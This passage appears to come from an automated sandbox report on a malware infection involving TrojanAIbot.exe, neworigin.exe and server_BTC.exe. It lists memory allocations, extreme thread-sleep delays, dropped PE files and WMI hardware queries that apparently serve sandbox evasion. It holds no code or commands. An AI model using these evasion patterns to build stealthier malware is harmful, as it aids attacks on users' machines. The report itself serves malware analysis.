                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: FC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2980000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4980000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: C90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2890000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 26A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: CC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2860000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 26D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2250000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 23D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 43D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 1730000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 3050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 5050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: A40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2550000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4550000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 7009Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 2775Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7682
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1876
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 2993
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 6796
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 6545
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 3171
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 3732
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 6074
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep count: 37 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -200000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99824s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 4072Thread sleep count: 7009 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99708s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99589s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99478s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 4072Thread sleep count: 2775 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99320s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99166s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98927s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98725s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98603s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98483s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98368s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98260s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98117s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97989s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97846s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97719s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97496s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97382s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97274s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97160s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -97035s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -96912s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -96772s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -96646s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -96522s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -96281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -96059s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -95943s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -95818s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -95693s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -95568s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -95443s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -95318s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -95193s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -95055s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -94941s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -94818s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -94696s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -94582s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -94459s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -94334s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -94209s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -94084s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -93960s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -93844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99725s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99616s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99505s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99382s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99261s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99148s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -99039s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98907s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160Thread sleep time: -98803s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6468Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep count: 7682 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 892Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep count: 1876 > 30
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3032Thread sleep time: -179580000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3032Thread sleep time: -407760000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 6664Thread sleep count: 43 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -99349s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -99157s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98999s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98869s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98758s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98649s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98377s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98238s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98089s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97963s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97713s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97603s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97479s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97335s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97079s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96552s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96360s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96152s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96008s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95868s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95747s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95592s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95416s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95272s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95135s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95030s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -94898s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -94777s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -94635s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -94473s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -94153s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -99790s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -99586s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -99417s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -99183s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -99076s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98962s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98850s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98723s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98333s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98182s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -98071s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97964s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97854s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97743s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97635s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97524s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97417s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97307s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97197s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -97087s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96979s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96869s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96759s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96650s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96540s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96432s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96323s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96213s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -96103s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95994s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95881s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95761s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95519s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432Thread sleep time: -95386s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4040Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep count: 43 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -39660499758475511s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5600Thread sleep count: 3732 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -99886s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -99771s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -99632s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5600Thread sleep count: 6074 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -99517s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -99376s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -98968s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -98832s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -98708s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -98583s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -98458s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -98333s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -98208s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -98083s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -97958s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -97833s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -97708s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -97583s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -97458s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -97333s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -97208s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -97083s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -96958s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -96833s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -96708s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -96560s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -96451s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -96297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -96189s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -96068s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -95943s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -95818s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -95693s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -95568s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -95443s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -95318s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -95193s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -95068s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -94943s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -94818s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -94693s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -94568s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -94443s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -94318s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -94193s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -94068s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -93916s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -93660s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -93536s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -93411s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572Thread sleep time: -93286s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4092Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5756Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
